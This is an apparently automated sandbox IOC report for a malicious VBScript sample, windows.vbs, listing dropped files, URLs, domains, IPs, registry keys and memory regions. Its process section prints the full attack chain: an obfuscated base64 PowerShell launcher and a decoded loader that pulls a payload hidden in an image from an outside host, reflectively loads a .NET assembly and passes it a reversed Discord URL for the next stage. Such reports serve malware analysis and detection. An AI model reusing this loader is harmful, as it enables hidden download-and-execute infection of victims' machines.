IOC Report
windows.vbs

loading gif

Files

File Path
Type
Category
Malicious
windows.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\umxfl[1].txt
Unicode text, UTF-8 text, with very long lines (13333), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ix2nzop.rp0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gccontde.5xx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlmr2nss.zwp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykwpcdqs.ccj.ps1
ASCII text, with no line terminators
dropped
\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON
data
dropped
\Device\Mup\user-PC\PIPE\samr
GLS_BINARY_LSB_FIRST
dropped
\Device\Mup\user-PC\PIPE\wkssvc
GLS_BINARY_LSB_FIRST
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreMDgTreBmDgTreDDgTreDgTreMDgTreBjDgTreGQDgTreMgBhDgTreDMDgTreMDgTreDgTrexDgTreDkDgTreOQBjDgTreDcDgTreOQDgTre2DgTreDUDgTreMwDgTre0DgTreDMDgTreNgDgTre2DgTreDMDgTreZQBmDgTreGIDgTreODgTreDgTre4DgTreGUDgTreZgDgTre1DgTreGEDgTreNDgTreDgTre5DgTreDDgTreDgTreMQDgTre2DgTreDQDgTreMgBlDgTreDcDgTreZQBlDgTreDUDgTreZgDgTre5DgTreDcDgTreZDgTreDgTre1DgTreDgDgTreNDgTreDgTrewDgTreGUDgTreODgTreBhDgTreGEDgTreZDgTreDgTrexDgTreGUDgTreZQBhDgTreGYDgTreYQDgTre9DgTreG0DgTreaDgTreDgTremDgTreDDgTreDgTreZgBhDgTreGMDgTreMwDgTrezDgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreDDgTreDgTreNwBjDgTreDEDgTreNQDgTrezDgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTrecwB3DgTreG8DgTreZDgTreBuDgTreGkDgTredwDgTrevDgTreDYDgTreMwDgTrexDgTreDQDgTreNgDgTre3DgTreDkDgTreNgDgTre4DgTreDYDgTreMgDgTre2DgTreDEDgTreNDgTreDgTre2DgTreDUDgTreMwDgTreyDgTreDEDgTreLwDgTrezDgTreDQDgTreNgDgTrexDgTreDkDgTreMQDgTrexDgTreDEDgTreNQDgTrezDgTreDIDgTreMDgTreDgTre3DgTreDIDgTreNgDgTre1DgTreDMDgTreMgDgTrexDgTreC8DgTrecwB0DgTreG4DgTreZQBtDgTreGgDgTreYwBhDgTreHQDgTredDgTreBhDgTreC8DgTrebQBvDgTreGMDgTreLgBwDgTreHDgTreDgTreYQBkDgTreHIDgTrebwBjDgTreHMDgTreaQBkDgTreC4DgTrebgBkDgTreGMDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreEEDgTreZDgTreBkDgTreEkDgTrebgBQDgTreHIDgTrebwBjDgTreGUDgTrecwBzDgTreDMDgTreMgDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://uploaddeimagens.com.br
unknown
malicious
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
188.114.96.3
malicious
https://paste.ee/d/umxfl
188.114.97.3
malicious
http://app01.system.com.br/RDWeb/Pages/login.aspx
unknown
malicious
http://crl.microsoft~#
unknown
http://nuget.org/NuGet.exe
unknown
http://app01.system.com.br/RDWeb/Pages/login.aspx_Tex
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://cdn.discordapp.com/attachments/1235627023511191643/1235641626869764136/windows.txt?ex=66351c70&is=6633caf0&hm=afaee1daa8e0485d79f5ee7e2461094a5fe88bfe3663435697c99103a2dc00f0&
162.159.129.233
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://analytics.paste.ee
unknown
https://aka.ms/pscore6
unknown
http://uploaddeimagens.com.br
unknown
https://paste.ee/d/umxflJ
unknown
https://paste.ee/&
unknown
https://github.com/Pester/Pester
unknown
https://paste.ee/l
unknown
http://app01.system.com.br/RDWeb/Pages/login.aspxd
unknown
https://www.google.com
unknown
http://crl.micro
unknown
https://paste.ee/d/umxflerD
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://analytics.paste.ee;
unknown
https://paste.ee/d/umxfl&
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
https://pastsubposto.subpostosubposto/d/umxfl
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
https://go.microsoft.coT
unknown
https://pastsubposto.subpostosubposto/d/um
unknown
There are 27 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
paste.ee
188.114.97.3
malicious
uploaddeimagens.com.br
188.114.96.3
malicious
cdn.discordapp.com
162.159.129.233

IPs

IP
Domain
Country
Malicious
188.114.97.3
paste.ee
European Union
malicious
188.114.96.3
uploaddeimagens.com.br
European Union
malicious
162.159.129.233
cdn.discordapp.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
A7919FE000
stack
page read and write
1D4AC098000
trusted library allocation
page read and write
1250FD9E000
heap
page read and write
1250FDC5000
heap
page read and write
12510BB0000
heap
page read and write
A791D3E000
stack
page read and write
7FFE1691A000
trusted library allocation
page read and write
1D4ABC7C000
trusted library allocation
page read and write
A791EBC000
stack
page read and write
A7916FF000
stack
page read and write
1250FD9E000
heap
page read and write
7FFE16980000
trusted library allocation
page read and write
DB1EC3B000
stack
page read and write
1250E0C1000
heap
page read and write
12510740000
trusted library allocation
page read and write
1250FD7E000
heap
page read and write
1D4ABF46000
trusted library allocation
page read and write
1D4BBB11000
trusted library allocation
page read and write
1D4A9D90000
heap
page readonly
2CA158B3000
trusted library allocation
page read and write
2CA1BB75000
trusted library allocation
page read and write
125100F3000
heap
page read and write
12FE1FC000
stack
page read and write
2CA15AEB000
trusted library allocation
page read and write
12510B67000
heap
page read and write
1D4C3C5A000
heap
page read and write
1250E000000
heap
page read and write
12510E44000
heap
page read and write
1250FDC5000
heap
page read and write
1D4A9AFF000
heap
page read and write
12510114000
heap
page read and write
7FFE16846000
trusted library allocation
page execute and read and write
1D4C3CC7000
heap
page read and write
1250FDB7000
heap
page read and write
DB1E8B7000
stack
page read and write
1D4A9AE0000
heap
page read and write
1250FD9E000
heap
page read and write
1250E029000
heap
page read and write
1250E0E7000
heap
page read and write
2CA178EB000
trusted library allocation
page read and write
12510B8C000
heap
page read and write
1D4AB7C0000
heap
page read and write
7FFE16880000
trusted library allocation
page execute and read and write
7FFE16A40000
trusted library allocation
page read and write
125100D0000
heap
page read and write
DB1E9B8000
stack
page read and write
DB1E93C000
stack
page read and write
1250FD80000
heap
page read and write
12FE6FB000
stack
page read and write
1D4C3C25000
heap
page read and write
12510B40000
heap
page read and write
1D4A9B58000
heap
page read and write
7FFE16942000
trusted library allocation
page read and write
1D4AC248000
trusted library allocation
page read and write
1D4A9D80000
trusted library allocation
page read and write
1250E030000
heap
page read and write
125100F6000
heap
page read and write
1D4A9DA0000
trusted library allocation
page read and write
12510E51000
heap
page read and write
1250FD9E000
heap
page read and write
1D4C3E62000
heap
page read and write
1250E0B2000
heap
page read and write
1250E0B2000
heap
page read and write
1D4C3C8A000
heap
page read and write
1250E085000
heap
page read and write
1250FDC5000
heap
page read and write
1D4A9B3A000
heap
page read and write
2CA13731000
heap
page read and write
125100F6000
heap
page read and write
7FFE16764000
trusted library allocation
page read and write
1D4C3D20000
heap
page read and write
1250E082000
heap
page read and write
125100FE000
heap
page read and write
DB1E47E000
stack
page read and write
12510B71000
heap
page read and write
2CA139A0000
trusted library allocation
page read and write
1250FD9E000
heap
page read and write
7FFE16762000
trusted library allocation
page read and write
12FE0FC000
stack
page read and write
1250E0A1000
heap
page read and write
7FFE16950000
trusted library allocation
page execute and read and write
1250E0F3000
heap
page read and write
1D4A9B40000
heap
page read and write
12510B60000
heap
page read and write
DB1E5FD000
stack
page read and write
12510B9B000
heap
page read and write
1D4ABB96000
trusted library allocation
page read and write
2CA13739000
heap
page read and write
1D4A9D20000
heap
page read and write
2CA13718000
heap
page read and write
12510200000
heap
page read and write
1250E0BA000
heap
page read and write
1D4AC068000
trusted library allocation
page read and write
1250FD89000
heap
page read and write
1250FD84000
heap
page read and write
7FFE16960000
trusted library allocation
page read and write
1250E0E2000
heap
page read and write
1250FD72000
heap
page read and write
12510B88000
heap
page read and write
1250E0F3000
heap
page read and write
1250FD80000
heap
page read and write
12510BE5000
heap
page read and write
2CA13774000
heap
page read and write
12510380000
heap
page read and write
7FFE1677B000
trusted library allocation
page read and write
A791A7E000
stack
page read and write
12510C82000
heap
page read and write
1250FD7D000
heap
page read and write
1250DFC0000
heap
page read and write
1250E02F000
heap
page read and write
1250E086000
heap
page read and write
7FFE16763000
trusted library allocation
page execute and read and write
125100D0000
heap
page read and write
1D4C3C4F000
heap
page read and write
1250FD9E000
heap
page read and write
1D4AC232000
trusted library allocation
page read and write
2CA152C0000
heap
page execute and read and write
2CA26388000
trusted library allocation
page read and write
1250E210000
heap
page read and write
1D4AC093000
trusted library allocation
page read and write
1250E0E2000
heap
page read and write
7FFE1681C000
trusted library allocation
page execute and read and write
2CA1372D000
heap
page read and write
12FD755000
stack
page read and write
7FFE16A50000
trusted library allocation
page read and write
1D4AC12D000
trusted library allocation
page read and write
2CA13703000
heap
page read and write
1250FD8E000
heap
page read and write
DB1E77E000
stack
page read and write
7FFE169B0000
trusted library allocation
page read and write
12510B7B000
heap
page read and write
12510BB8000
heap
page read and write
125100D6000
heap
page read and write
7FFE16A30000
trusted library allocation
page read and write
1D4C3CE7000
heap
page read and write
7FFE16930000
trusted library allocation
page execute and read and write
1D4AB7C8000
heap
page read and write
12510B8F000
heap
page read and write
12510E43000
heap
page read and write
1250E0C6000
heap
page read and write
2CA1374D000
heap
page read and write
1D4ABC35000
trusted library allocation
page read and write
125100F1000
heap
page read and write
125100A3000
heap
page read and write
2CA256A1000
trusted library allocation
page read and write
12510E31000
heap
page read and write
2CA1BB7D000
trusted library allocation
page read and write
12510350000
heap
page read and write
1250FD92000
heap
page read and write
7FFE1676D000
trusted library allocation
page execute and read and write
1D4A9B3E000
heap
page read and write
A7918FF000
stack
page read and write
A79197F000
stack
page read and write
12510B5E000
heap
page read and write
7FFE16A90000
trusted library allocation
page read and write
12FE4FF000
stack
page read and write
2CA25988000
trusted library allocation
page read and write
125100F3000
heap
page read and write
12510B98000
heap
page read and write
1D4ABC2F000
trusted library allocation
page read and write
2CA15A7A000
trusted library allocation
page read and write
2CA15691000
trusted library allocation
page read and write
12510D00000
heap
page read and write
A791B3E000
stack
page read and write
1D4ABFB3000
trusted library allocation
page read and write
1250FD9E000
heap
page read and write
12510310000
heap
page read and write
1D4AC0E4000
trusted library allocation
page read and write
1D4C3E28000
heap
page read and write
2CA15340000
heap
page read and write
7FFE16A00000
trusted library allocation
page read and write
1250E0CE000
heap
page read and write
2CA13800000
heap
page read and write
1250FDB7000
heap
page read and write
1250E084000
heap
page read and write
2CA15A82000
trusted library allocation
page read and write
1250FD9E000
heap
page read and write
12510114000
heap
page read and write
7FFE16A80000
trusted library allocation
page read and write
2CA13A30000
trusted library allocation
page read and write
12510E31000
heap
page read and write
1D4ABF8F000
trusted library allocation
page read and write
1D4ABC38000
trusted library allocation
page read and write
2CA25691000
trusted library allocation
page read and write
7FFE16A10000
trusted library allocation
